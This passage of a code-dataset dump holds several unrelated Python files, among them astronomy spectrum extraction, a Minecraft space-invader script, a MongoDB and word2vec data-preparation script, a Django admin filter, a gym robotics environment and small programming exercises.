_onchange_emp_part(self):\n        for rec in self:\n            if rec.employee_id:\n                rec.partner_id = False\n            else:\n                rec.employee_id = False\n\n","sub_path":"journal_entries_employee/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"290426457","text":"import sys\nn = int(sys.stdin.readline())\na = [0] * 8001\nfor i in range(n):\n    p = int(sys.stdin.readline())\n    a[p + 4000] += 1\ns = 0 #sum\nc = 0 #median\nl = -1 #lower bound\nu = 0 #upper bound\nx = 0 #count\nfor i in range(8001):\n    if a[i] > 0:\n        s += (i - 4000) * a[i]\n        if l == -1:\n            l = i\n        if u < i:\n            u = i\n        if x <= n // 2 and x + a[i] > n // 2:\n            c = i\n        x += a[i]\nprint(round(s / n))\nprint(c - 4000)\nm = max(a) #mode\no = a.index(m) #index of mode\ntry:\n    print(a.index(m, o + 1) - 4000)\nexcept ValueError:\n    print(o - 4000)\nprint(u - l)","sub_path":"source/nojam/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"453161044","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom astropy.io import fits\n\ndef wave_grid(data, header):\n\t\"\"\"Returns wave grid based on header\"\"\"\n\tcrval1 = header['CRVAL1'] #Starting value\n\tcdelt1 = header['CDELT1'] #Pixel size\n\twavegrid = crval1 + cdelt1 * np.arange(data.shape[1])\n\t\n\treturn crval1, wavegrid\n\t\n\t\ndef spectra_viewer(tmp_data):\n    \"\"\"Produces plot of the 2D data\"\"\"\n    \n    #print(tmp_data.shape)\n    tmp_header = data[idx].header\n    \n    #Create the wavegrid; wave_grid expects (data, header)\n    crval1, wavegrid = wave_grid(tmp_data, tmp_header)\n    \n    #Plot\n    #plt.subplot(1,2,1)\n    plt.imshow(tmp_data, extent = (crval1, wavegrid[-1], tmp_data.shape[0], 0), \\\n        cmap = 'gray', aspect = 'auto', vmin = 
0, vmax = 1)\n plt.title(\"2D image spectra\")\n plt.xlim(697, 700) #for masknumber = 1624, idx = 98\n plt.grid(False)\"\"\"\n\ndef preprocess_bino(fname_data = \"obj_abs_slits_lin.fits\", fname_err = \"obj_abs_err_slits_lin.fits\",\\\n fname_extr = \"obj_abs_slits_extr.fits\", masknumber = 1624, pos_width = 10): \n \"\"\"\n Based on Jae's original code. Goal is to process binospec data in a way\n such that it can be used to extract 1D spectra. \n \n 1. For a given mask, finds where the galaxies are along the position\n axis. This is required because we extended the slits whenever possible.\n OBPOSVAL from the header tells us where the central points of the \n galaxies per slit are so that we can do extraction only around that \n region.\n \n 2. Extract +/- pos_width pixels around the galaxies for 1D extraction. \n Default set to 10 px.\n \n 3. The native data unit is ergs/cm^2/s/nm. Preprocessor changes this to\n 10^-17 ergs/cm^2/s/Angstrom.\n \n 4. Following conditions imposed -\n Data: \n - If NaN: Data ZERO and Error infinity.\n Error:\n - If NaN: Error infinity and Data ZERO.\n \n Args:\n fname_data: data file name\n fname_err: error file name\n fname_extr: head file name to get OBPOSVAL\n masknumber: mask number\n post_width: amount of pixels to be used for extraction above and \n below a given galaxy\n Returns: \n data_err: A numpy array of shape (Ntargets+1, 2, pos_width, num_cols). \n - Though the native data have different number of rows, we use a single fixed number here.\n - Channel 0: Data\n - Channel 1: Error\n list_headers: List of headers\n\n Note, first spectrum in native data is saved in loc \"1\". We follow the same convention.\n \"\"\"\n \n #read data. 0th element is blank\n data_dir = data_dir = \"../DATA_JULY18/cattarget_\" + str(masknumber) + \"/reduced/\"\n #print(data_dir)\n data = fits.open(data_dir + fname_data)\n err = fits.open(data_dir + fname_err)\n extr = fits.open(data_dir + fname_extr)\n extr = extr[1] #Need only one header to get all the OBPOSVALs\n \n infinity = 1e60\n #unit_conversion = 10**19\n unit_conversion = 1. 
#for now, keeping it 1.\n\n # ---- Output variables\n data_err = None\n list_headers = [None]\n \n # ---- Place holder for the output array\n Ncols = data[1].data.shape[1]\n data_err = np.zeros((len(data), 2, 2*pos_width+1, Ncols))\n data_err[:, 1, :, :] = infinity # All data/errors are initially set to zero and infinity.\n\n for idx in range(1, len(data)):\n #for idx in range(98, 99):\n #Find the centroid along yaxis\n obpos = 'OBPOS' + str(idx)\n obposval = extr.header[obpos]\n obposval = int(obposval) #need to convert to int for slicing\n #print(f\"idx: {idx}\")\n # ---- Import data and unit conversion\n data_tmp = data[idx].data * unit_conversion\n err_tmp = err[idx].data * unit_conversion\n #print(data_tmp.shape)\n #print(data_tmp.shape)\n # ---- Trim the data\n #print(f\"obposval: {obposval}\")\n data_tmp = data_tmp[obposval-pos_width:obposval+pos_width+1]\n err_tmp = err_tmp[obposval-pos_width:obposval+pos_width+1]\n #print(data_tmp.shape)\n \n # ---- Apply preprocessing\n ibool = np.logical_or(np.isnan(err_tmp), np.isnan(data_tmp), err_tmp <=0.)\n data_tmp[ibool] = 0.\n err_tmp[ibool] = infinity\n \n # ---- Save data\n #print(data_err[idx, 0].shape)\n #print(\"------\")\n data_err[idx, 0] = data_tmp\n data_err[idx, 1] = err_tmp\n\n # ---- Save header\n header_tmp = data[idx].header\n list_headers.append(header_tmp)\n \n #To debug\n #spectra_viewer(data_tmp)\n \n return data_err, list_headers\n\t\ndef extract_single_data(data_err, list_headers, specnum):\n\t\"\"\"\n\tExtract single spectrum data, err, header from the list, arr provided by preprocessor.\n\t- specnum: Target object number in a file. Ranges from 1 through approx. 140.\n\t\"\"\"\n\theader = list_headers[specnum]\n\tdata = data_err[specnum, 0]\n\terr = data_err[specnum, 1]\n\t\n\treturn data, err, header\n\ndef ivar_from_err(err):\n\treturn 1./np.square(err)\n\ndef bit_from_header(header):\n\tname = header[\"SLITOBJ\"]\n\tif name == \"stars\":\n\t\tname = 2**1\n\telif name == \"gal\":\n\t\tname = 2**2\n\treturn int(name)\n\t\ndef naive_profile(data, ivar):\n\t\"\"\"\n\tReturns naive normalized profile\n\t\"\"\"\n\tK = np.sum(data * ivar, axis = 1) / np.sum(ivar, axis = 1)\n\tK /= np.sum(K) # Normalization\n\treturn K\n\ndef extract_stellar_profiles(masknumber, data_err, list_headers):\n\tK_collection = []\n\t\n\tcount = 0 #counter for how many stellar profiles\n\tfor specnum in range(1, len(list_headers)):\n\t\tdata, err, header = extract_single_data(data_err, list_headers, specnum)\n\t\tivar = ivar_from_err(err)\n\n\t\tBIT = bit_from_header(header)\n\t\t\n\t\t# ---- Perform optimal extraction 1D spectrum from 2D\n\t\tif (BIT == 2):\n\t\t\tK = naive_profile(data, ivar)\n\t\t\tK_collection.append(K) # Collect K into a list.\n\t\t\t\n\t\t\t#Plot stellar profile; optional for diagnosis\n\t\t\t#crval1, wavegrid = wave_grid(header, data)\n\t\t\t#plt.imshow(data, extent = (crval1, wavegrid[-1], data.shape[0], 0), \\\n\t\t\t#cmap = 'gray', aspect = 'auto', vmin = 0, vmax = 1)\n\t\t\t#plt.title(\"mask: \" + str(masknumber) + \" idx: \" + str(specnum) +\" count: \" + str(count))\n\t\t\t#plt.savefig(\"mask-\" + str(masknumber) + \"-idx-\" + str(specnum) +\"-count-\" + str(count) + \".pdf\",\\\n\t\t\t#dpi = 600, bbox_inches = 'tight')\n\t\t\tprint(\"mask: \" + str(masknumber) + \" idx: \" + str(specnum) +\" count: \" + str(count))\n\t\t\tcount = count + 1\n\treturn K_collection\n\t\ndef K_exp_profile(mu, sig, beta = 2, Nrows = 21): \n\t\"\"\"\n\tGenerate gaussian extraction profile of length Nrows\n\tgiven mu and 
sig.\n\t\"\"\"\n\tx_arr = np.arange(0, Nrows, 1)\n\tK_gauss = np.exp(-0.5 * (np.abs(x_arr - mu)/(sig))**beta)\n\tK_gauss /= np.sum(K_gauss)\n\t\n\treturn K_gauss\n\t\ndef plot_kernels(masknumber, K_collection, K_extract, fname):\n\t\"\"\"\n\tPlot the collection of stellar kernels and the ultimate\n\textraction kernel at the center.\n\tModify to include masknumber to plot pathological cases\n\t\"\"\"\n\t\n\tK_collection = np.array(K_collection)\n\tfig, ax = plt.subplots(1, figsize=(10, 5))\n\tfor i in range(len(K_collection)):\n\t\tif(masknumber == 1624 or masknumber == 1625):\n\t\t\tif(K_collection[i, 0] == np.min(K_collection[:,0])):\n\t\t\t\tprint(i)\n\t\t\t\tax.plot(K_collection[i], c=\"green\", lw=0.5) \n\t\t\telse:\n\t\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\t\telif(masknumber == 1627):\n\t\t\tif(K_collection[i, 0] == np.max(K_collection[:,0])):\n\t\t\t\tprint(i)\n\t\t\t\tax.plot(K_collection[i], c=\"green\", lw=0.5) \n\t\t\telse:\n\t\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\t\telse:\n\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\tax.plot(K_extract, c=\"blue\", lw=1.5)\n\t#ax.set_ylim([-0.03, 0.3])\n\tax.axhline(y=0, c=\"black\", ls=\"--\", lw=1.)\n\tplt.savefig(fname, dpi=600, bbox_inches=\"tight\")\n\tplt.close()\n\n\treturn\n\t\ndef index_edges(data, num_thres=20):\n\t\"\"\"\n\tGiven long postage stamp of data, return the edges.\n\t\"\"\"\n\tidx_min = 0\n\tidx_max = data.shape[1]-1\n\ttally = np.sum(data == 0., axis=0)\n\twhile tally[idx_min] > num_thres:\n\t\tidx_min += 1\n\twhile tally[idx_max] > num_thres:\n\t\tidx_max -=1\n\treturn idx_min, idx_max\n\ndef produce_spec1D(data_err, list_headers, K_extract, mu, fname_prefix=None, verbose=True):\n\t\"\"\"\n\tGiven 2D spectrum and the extraction kernel K_extract,\n\tproduce 1D spectra (Ntargets+1, 2, Ncols) and their inverse variance.\n\t\"\"\"\n\tdata_ivar_1D = np.zeros((data_err.shape[0], 2, data_err.shape[3]))\n\tK_extract = K_extract[:,np.newaxis]\n\tfor specnum in range(1, len(list_headers)):\n\t\tif verbose and ((specnum % 10) == 0): #Show progress every 10 spectra\n\t\t\tprint(\"Processing spec num: %d\" % specnum)\n\t\tdata, err, header = extract_single_data(data_err, list_headers, specnum)\n\t\tivar = ivar_from_err(err)\n\n\t\tspec1D_ivar = np.sum(np.square(K_extract) * ivar, axis=0)\n\t\tspec1D = np.sum(K_extract * data * ivar, axis=0) / spec1D_ivar\n\t\t\n\t\tdata_ivar_1D[specnum, 0] = spec1D\n\t\tdata_ivar_1D[specnum, 1] = spec1D_ivar\n\t\t\n\t\t#extract edges along wavelength\n\t\tidx_min, idx_max = index_edges(data, num_thres=14)\n\t\t\n\t\t#produce wavegrid to see in spectra in range\n\t\tcrval1, wavegrid = wave_grid(data, header)\n\t\t\t\n\t\tif fname_prefix is not None:\n\t\t\tplt.close()\n\t\t\t# ---- Spec figures\n\t\t\t\n\t\t\tfname = fname_prefix + \"spec%d-2D.png\" %specnum\n\t\t\tfig, ax = plt.subplots(1, figsize=(17, 1))\n\t\t\tax.imshow(data, aspect=\"auto\", cmap=\"gray\", interpolation=\"none\",\\\n\t\t\textent = (crval1, wavegrid[-1], data.shape[0], 0), vmin=0., vmax=1)\n\t\t\tax.set_xlim(wavegrid[idx_min], wavegrid[idx_max])\n\t\t\tax.axhline(y=mu+0.5, c=\"red\", ls=\"--\", lw=0.8)\n\t\t\tax.set_xlabel(r\"$\\lambda$ [nm]\", fontsize = 15)\n\t\t\tplt.savefig(fname, dpi=250, bbox_inches=\"tight\")\n\t\t\tplt.close()\n\t\t\t\n\t\t\t\"\"\"# ---- Histogram of centers determined\n\t\t\tfname = fname_prefix + \"spec%d-centers.png\" %specnum\n\t\t\tfig, ax = plt.subplots(1, figsize=(7, 3))\n\t\t\tax.hist(row_centers, bins=np.arange(0.5, 32.5, 1), histtype=\"step\", color=\"black\", 
normed=True)\n\t\t\tax.plot(K_extract, c=\"red\", label=\"K_stellar\")\n\t\t\tax.axvline(x=mu, c=\"red\", ls=\"--\", lw=0.4)\n\t\t\tplt.savefig(fname, dpi=200, bbox_inches=\"tight\")\n\t\t\tplt.close()\"\"\"\n\n\treturn data_ivar_1D","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"365697613","text":"###make your own space invader program###\nimport mcpi.minecraft as minecraft, time, random #importing mcpi.minecraft and giving it the alius of minecraft, and imports time and random modules\nmc = minecraft.Minecraft.create()\n\nmc.setBlocks(-30,-5,-30,30,30,30,0) #clears an area\nmc.player.setPos(11,0,0) #sets players position in front of where the sapce invader will be\n\ncolours = [\"white\",\"orange\",\"magenta\",\"light blue\",\"yellow\",\"lime\",\"pink\",\"grey\",\"light grey\",\"cyan\",\"purple\",\"blue\",\"brown\",\"green\",\"red\",\"black\"]\n\n\n#defines a function to convert the string the user inputs into a block id,\n#it takes the parameter colourstring\ndef colourconvertor(colourstring):\n # converts the colourstring into lower case and removes spaces\n colourstring = colourstring.lower().strip()\n\n blockid = -1 #defines blockid as -1 so later we can see if it changes in the for loop\n \n \n for bid in range (0,len(colours)): #bid (block id) is made equal to each string in colours\n if colourstring == colours[bid]: #if what the user entered is in the colours list then blockid is made equal to the number of the colour in the colours list, and the loop is stopped \n blockid = bid\n break\n\n if blockid == -1: #if the blockid hasnt changed (because what was entered wasnt in the colours list) then a random colour is chosen\n blockid = random.randint(0, len(colours)) #picks a random colour from the list\n print (\"I didn't understand that, I'll just choose ...\" +colours[blockid] +\"!\") #prints what the random choice \n\n return blockid \n \n \n\n \n\n\n#defines a function called drawmirroredblocks \n#takes the parameters of the coordinates, and the colour and background\n#colour of the space invader, and the blocks to colour\ndef drawmirroredblocks(xcorner,ycorner,zcorner,colour,pixels):\n \n wool = 35 #wool is defined\n y = ycorner\n for block in pixels:\n if block <0:\n y = y+block # when blocks are negative, the y coordiinate moves down by that number, so starting a new line\n else:\n x = xcorner + block #if it isnt a negative, the numbers are used on the x coordinate \n z = zcorner #the z coordinate stays the same\n\n mc.setBlock(x,y,z,wool,colour) #this only creates half the space invader\n\n x = xcorner + 12 - block #mirrors the half the space invader to create a whole space invader\n\n mc.setBlock(x,y,z,wool,colour) #sets the blocks with the new x coordinate to mirror the space invader, creating the whole space invader\n \ndef spaceinvader(xcorner,ycorner,zcorner,colour,background): #draws an animated space invader\n wool = 35 #wool is defined\n mc.setBlocks(xcorner,ycorner,zcorner,xcorner+12,ycorner-9,zcorner,wool,background) #creates a rectangle which is the colour of the background the user chose\n pixels =(-1,3,-1,4,-1,3,4,5,6,-1,2,3,5,6,-1,1,2,3,4,5,6,-1,1,3,4,5,6,-1,1,3,-1,4,5) #the blocks that are the base shape of the space invader\n arms_up =(-2,1,-1,1,-1,1,-4,2) #arms up extra blocks\n arms_down =(-6,1,-1,1,-1,4,5) #arms down extra blocks\n \n drawmirroredblocks(xcorner,ycorner,zcorner,colour,pixels) #draws space invader\n 
\n while True: #deletes one set of arms and draws the other, in an infinite loop, making the space invader move\n drawmirroredblocks(xcorner,ycorner,zcorner,colour,arms_up) \n drawmirroredblocks(xcorner,ycorner,zcorner,background,arms_down)\n time.sleep(1)\n drawmirroredblocks(xcorner,ycorner,zcorner,background,arms_up) \n drawmirroredblocks(xcorner,ycorner,zcorner,colour,arms_down)\n time.sleep(1)\n \n \n\n\n# asks what colour the user wants the space invader to be\nusercolour = raw_input (\"what colour do you want the space invader to be?\") \n\ncolour = colourconvertor(usercolour) #runs the function colourconvertor on the colour the user chose\n \n#asks the user what colour they want the background colour to be \nuserbackground = raw_input (\"what colour background do you want it to have?\")\n\n\n\nbackground = colourconvertor(userbackground)#runs the function colourconvertor on the background colour the user chose\n\nprint (\"ok then, I'll make a space invader that is \" +colours[colour] +\" and has a background colour of \" +colours[background]) #tells the user what colour the space invader will be\n\nspaceinvader(5,4,15,colour,background) #runs the space invader function with the colour and background the user chose\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Minecraft/Space_invader/space_invader_6.py","file_name":"space_invader_6.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"275244701","text":"''' To reverse sentence in right order Ex: Good Morning. Output: doog gninrom\nhttps://stackoverflow.com/questions/493819/python-join-why-is-it-string-joinlist-instead-of-list-joinstring?rq=1\n'''\nsentence=input(\"Enter the sentence to get reversed sentence: \")\nreversed_sentence=sentence[::-1] \n# Used Slicing Technique- a string[::-1] to reverse string\ntemp=reversed_sentence.split() #used split for each word to copy to a temp list var\ntemp.reverse() #Reversed splitted temp list\nreversed_list=list(temp) #copied reversed temp list using list()-python v3 function not v2\n#Now we have to join the reversed list in reverse open\nreversed_sentence=\" \".join(reversed_list) #used \"\".join() to slice and merge the reversed list\nprint(reversed_sentence.lower()) #used lower() to change all words to lowercase.\n","sub_path":"repl.it/reverse_sentence.py","file_name":"reverse_sentence.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"527844664","text":"# Joshua Li\n# Euler Problem #19\n\n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n\nfrom datetime import date, datetime, timedelta\n\ndef date_range(start, end, delta):\n curr = start\n while curr < end:\n yield curr\n curr += delta\n\nanswer = 0\nfor result in date_range(date(1901, 1, 1), date(2000, 12, 31), timedelta(days=1)):\n\tif result.day == 1 and result.isoweekday() == 7:\n\t\tanswer += 1\nprint(answer)","sub_path":"Problems 11-20/EulerProblem19.py","file_name":"EulerProblem19.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111844139","text":"import json\nimport random\nimport os\n\n\ndef db2local(save_file):\n \"\"\"\n 从MongoDB 获取数据,保存到save_file中\n :param save_file:\n :return:\n \"\"\"\n # 配置client\n import pymongo\n client = pymongo.MongoClient(\"192.168.50.139\", 27017)\n # 
设置database\n db = client['ai-corpus']\n # 选择哪个collections\n collection = db['as_corpus']\n mydoc = collection.find({})\n with open(save_file, 'w') as f:\n for x in mydoc:\n x.pop('_id')\n content = json.dumps(x)\n f.write(content + '\\n')\n print(f\"文件已生成{save_file}\")\n\ndef split_all(save_file, train_rate=0.9, test_rate=0.1):\n \"\"\"\n 拆分成90%训练集,10%测试集\n :param save_file:\n :param train_rate: float\n :param test_rate:\n :return:\n \"\"\"\n random.seed(30)\n examples = []\n with open(save_file, 'r') as f:\n lines = f.readlines()\n # 每3行一个样本\n for i in range(0, len(lines), 3):\n examples.append((lines[i], lines[i + 1], lines[i + 2]))\n random.shuffle(examples)\n total = len(examples)\n train_num = int(total * train_rate)\n test_num = int(total * test_rate)\n train_file = os.path.join(os.path.dirname(save_file), 'train.txt')\n test_file = os.path.join(os.path.dirname(save_file), 'test.txt')\n with open(train_file, 'w') as f:\n for x in examples[:train_num]:\n f.write(x[0])\n f.write(x[1])\n f.write(x[2])\n with open(test_file, 'w') as f:\n for x in examples[train_num:]:\n f.write(x[0])\n f.write(x[1])\n f.write(x[2])\n print(f\"文件已生成\\n {train_file}, 样本数: {train_num} \\n {test_file}, 样本数: {test_num}\")\n\ndef textsentiment_process(save_file, new_file, truncate=None):\n \"\"\"\n 类似\n $T$ is super fast , around anywhere from 35 seconds to 1 minute .\n Boot time\n 1\n :param save_file:\n :param new_file: 存储到新文件\n :param truncate: 截断处理,截断前后,默认为None,可以为int,截断保留数字\n :return: 存储到文件\n \"\"\"\n # 原始文件中的sScore的映射方式\n class2id = {\n \"NEG\": 0,\n \"NEU\": 1,\n \"POS\": 2,\n }\n id2class = {value: key for key, value in class2id.items()}\n with open(save_file, 'r') as f:\n lines = f.readlines()\n # 打印多少条样本\n print_example = 10\n # 总数据量\n total = 0\n with open(new_file, 'w') as f:\n for line in lines:\n line_chinese = json.loads(line)\n # 使用 $T$代表apsect\n content = line_chinese[\"content\"]\n # 如果这个句子没有aspect,那就过滤掉\n if not line_chinese[\"aspect\"]:\n continue\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n sScore = aspect[\"sScore\"]\n start = aspect[\"start\"]\n end = aspect[\"end\"]\n # 验证一下单词的位置是否在newcontent中位置对应\n aspectTerm_insentence = \"\".join(content[start:end])\n if not aspectTerm == aspectTerm_insentence:\n raise Exception(f\"单词在句子中位置对应不上,请检查,句子行数{total}, 句子是{line_chinese}\")\n if truncate:\n #如果truncate为数字,那么开始截断\n if truncate > start:\n left = content[:start]\n else:\n left = content[start-truncate:start]\n right = content[end:end+truncate]\n line1 = left + \"$T$\" + right\n else:\n line1 = content[:start] + \"$T$\" + content[end:]\n line2 = aspectTerm\n # sScore映射成我们需要的, -1,0,1格式\n line3 = str(sScore - 1)\n if print_example > 0:\n print(line1)\n print(line2)\n print(line3)\n print_example -= 1\n total += 1\n f.write(line1 + \"\\n\")\n f.write(line2 + \"\\n\")\n f.write(line3 + \"\\n\")\n print(f\"文件已生成{new_file}, 总数据量是{total}\")\n\ndef check_data(save_file):\n \"\"\"\n 没啥用,检查下数据\n :param save_file:\n :return:\n \"\"\"\n with open(save_file, 'r') as f:\n lines = f.readlines()\n\n without_aspect = []\n contents_lenth = []\n all_aspects = []\n for line in lines:\n line_chinese = json.loads(line)\n if not line_chinese[\"aspect\"]:\n without_aspect.append(line_chinese)\n print(line_chinese)\n else:\n contents_lenth.append(len(line_chinese[\"content\"]))\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n all_aspects.append(aspectTerm)\n print(f\"没有aspect的数量是{len(without_aspect)}\")\n max_lenth = max(contents_lenth)\n max_aspect = 
max(map(len, all_aspects))\n max_aspect_word = list(filter(lambda x: len(x)>20, all_aspects))\n print(f\"最大的句子长度是{max_lenth}\")\n print(f\"最长的Apsect长度是{max_aspect}\")\n print(f\"长度大于20的aspect有{max_aspect_word}\")\n\ndef clean_cache():\n \"\"\"\n 删除../data/cosmetics/cached* 文件\n :return:\n \"\"\"\n os.system(\"rm -rf ../datasets/cosmetics/cached*\")\n os.system(\"rm -rf ../logs/*\")\n\ndef prepare_for_word2vec(save_file):\n \"\"\"\n 拆分成sentence_file 和user_dict 用于训练词向量\n :param save_file:\n :return: sentence_file, user_dict\n \"\"\"\n sentence_file = os.path.join(os.path.dirname(save_file), \"sentence_file.txt\")\n user_dict = os.path.join(os.path.dirname(save_file), \"user_dict.txt\")\n with open(save_file, 'r') as f:\n lines = f.readlines()\n with open(sentence_file, 'w') as sf:\n with open(user_dict, 'w') as uf:\n for line in lines:\n line_chinese = json.loads(line)\n # 使用 $T$代表apsect\n content = line_chinese[\"content\"]\n sf.write(content + \"\\n\")\n # 如果这个句子没有aspect,那就过滤掉\n if not line_chinese[\"aspect\"]:\n continue\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n uf.write(aspectTerm + \"\\n\")\n return sentence_file, user_dict\n\ndef train_word2vec(sentence_file, user_dict, dimension=300):\n \"\"\"\n word2vec 训练词向量\n :param sentence_file: 原始文件,包含所有语句\n :param user_dict: 用户自定义的字典\n :param dimension: 嵌入维度\n :return:\n \"\"\"\n import gensim\n from gensim.models import word2vec\n import jieba.analyse\n import jieba\n # 加载自定义词典\n jieba.load_userdict(user_dict)\n # 分隔的单词\n word_file_path = os.path.join(os.path.dirname(sentence_file), \"word_file.txt\")\n model_path = os.path.join(os.path.dirname(sentence_file),\"cosmetics_300d.txt\")\n with open(word_file_path, 'w', encoding='utf-8') as writer:\n with open(sentence_file, 'r', encoding='utf-8') as reader:\n # 加载所有数据\n content = reader.read()\n # 分词\n content = jieba.cut(content)\n # 合并结果\n result = ' '.join(content)\n # 结果输出\n writer.write(result)\n # 加载单词\n sentences = word2vec.LineSentence(word_file_path)\n # 训练词向量\n # sg: 1代表(Skip-gram) 0(CBOW), 默认为0\n # hs: 1代表hierarchical softmax 0代表负采样negative, 默认为0\n model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1,\n window=3, size=dimension, compute_loss=True)\n model.train(sentences, total_examples=model.corpus_count, epochs=5)\n #保存成纯文本文件\n model.wv.save_word2vec_format(model_path, binary=False)\n\ndef conver_embedding_file():\n \"\"\"\n 转换我们自己的预训练词向量,到embdding file的格式为\n 单词 300d向量\n :return:\n \"\"\"\n import numpy as np\n import json\n embedding_file = \"../embedding/model.npy\"\n word2index_file = \"../embedding/word2index.json\"\n # 保存新的txt格式的embedding\n word2vec_file = \"../embedding/cosmetics_300d_w2v.txt\"\n embedding_array = np.load(embedding_file)\n print(\"embdding array的shape是(单词数,嵌入维度):\",embedding_array.shape)\n\n #但因嵌入单词的索引\n with open(word2index_file,'r',encoding=\"utf-8\") as f:\n content = f.read()\n word_index = json.loads(content)\n print(\"索引中单词总数是: \",len(word_index))\n print(\"eg: 单词 [马拉河] 的索引是:\",word_index['马拉河'])\n id2index = {v:k for k,v in word_index.items()}\n with open(word2vec_file, 'w', encoding=\"utf-8\") as f:\n for idx, arr in enumerate(embedding_array):\n word = id2index[idx]\n if word == \"[ZERO]\":\n word = \"0\"\n string_array = \" \".join(map(str, arr.tolist()))\n f.write(f\"{word} {string_array}\\n\")\n\nif __name__ == '__main__':\n save_file = \"../data_root_dir/cosmetics/all.txt\"\n new_file = \"../data_root_dir/cosmetics/final_all.txt\"\n # db2local(save_file)\n textsentiment_process(save_file, new_file)\n 
split_all(new_file, train_rate=0.9, test_rate=0.1)\n # check_data(save_file)\n # clean_cache()\n # conver_embedding_file()\n # sentence_file, user_dict = prepare_for_word2vec(save_file)\n # train_word2vec(sentence_file, user_dict)\n","sub_path":"examples/mnli_example/utils/get_data_from_mongo.py","file_name":"get_data_from_mongo.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"450972165","text":"from django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom .models import Coach\n\n\ndef full_name(obj):\n return \"{0} {1}\".format(obj.user.first_name, obj.user.last_name)\n\n\nfull_name.short_description = \"Full name\"\n\n\nclass StaffFilter(SimpleListFilter):\n title = 'staff status'\n parameter_name = 'is_staff'\n\n def lookups(self, request, model_admin):\n return (\n ('true', True),\n ('false', False),\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'true':\n return queryset.filter(user__in=User.objects.filter(is_staff=True))\n elif self.value() == 'false':\n return queryset.filter(user__in=User.objects.filter(is_staff=False))\n\n\nclass CoachAdmin(admin.ModelAdmin):\n list_display = [full_name, 'gender', 'skype', 'description']\n list_filter = (StaffFilter,)\n\nadmin.site.register(Coach, CoachAdmin)\n","sub_path":"coaches/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"303054190","text":"from gym import utils\nfrom gym.envs.robotics import fetch_env\n\n\nclass FetchReachEnv(fetch_env.FetchEnv, utils.EzPickle):\n def __init__(self, reward_type='sparse'):\n initial_qpos = {\n 'robot0:slide0': 0.4049,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n }\n fetch_env.FetchEnv.__init__(\n self, 'fetch/reach.xml', has_object=False, block_gripper=True, n_substeps=20,\n gripper_extra_height=0.2, target_in_the_air=True, target_offset=0.0,\n obj_range=0.15, target_range=0.15, distance_threshold=0.05,\n initial_qpos=initial_qpos, reward_type=reward_type)\n utils.EzPickle.__init__(self)\n","sub_path":"gym/gym/envs/robotics/fetch/reach.py","file_name":"reach.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"101863726","text":"# James Morrissey\n# computingID: jpm9rk\n# find the root of x^7-3 on the interval (1,2) using 7 iterations of the secant method\n\nimport math\n\nITERATION_MAX = 10\n\np_zero = 2\np_one = 1\n\ndef function(xvalue):\n yvalue = xvalue**7 - 3\n return yvalue\n\nfor i in range(ITERATION_MAX): # first iteration of this finds p_2\n estimated_root = p_one - function(p_one)*(p_one - p_zero)/(function(p_one) - function(p_zero)) # this is p2\n print('the estimated root for iteration', i+1, 'is', estimated_root)\n if i > -1:\n print(' 1: the absolute difference between p', i+2, 'and p', i+1, 'is', abs(estimated_root-p_one))\n print(' 2: the absolute difference between p', i+2, 'and the true root is', abs(estimated_root - 3**(1/7)))\n print(' 3: the absolute difference between p', i+1, 'and the true root is', abs(p_one-3**(1/7)))\n ratio = abs((estimated_root - p_one))/abs((p_one - p_zero))**1.618\n print(' the desired ratio is',ratio)\n p_zero = p_one\n p_one = estimated_root\n\n# Inspection of the output shows that after the initial 
iteration, the absolute difference between\n# p_n and the actual value of the root becomes the smallest of the three quantities. As expected, p_n is always\n# closer to the true value of the root than p_n-1, indicating that our approximations to the root are getting\n# better with each iteration\n# the actual value of the ratio asked for is about 1.79\n# doing 10 iterations of the secant method yields what is effectively 0 difference between estimated root\n# and the actual one. As shown if ITERATION_MAX is changed to 10, the last value for the ratio is 1.765 showing\n# that this ratio is tending toward 1.79\n","sub_path":"MORRISSEY_25_6.py","file_name":"MORRISSEY_25_6.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631557074","text":"import numpy\n\n\nclass RaveledMatrixList():\n \"\"\"\n Stores a list of matrices as one long vector.\n\n The matrices can still be accessed individually (in their original shape)\n through views. Any changes done to one of the matrices will be reflected in\n the raveled vector and vice 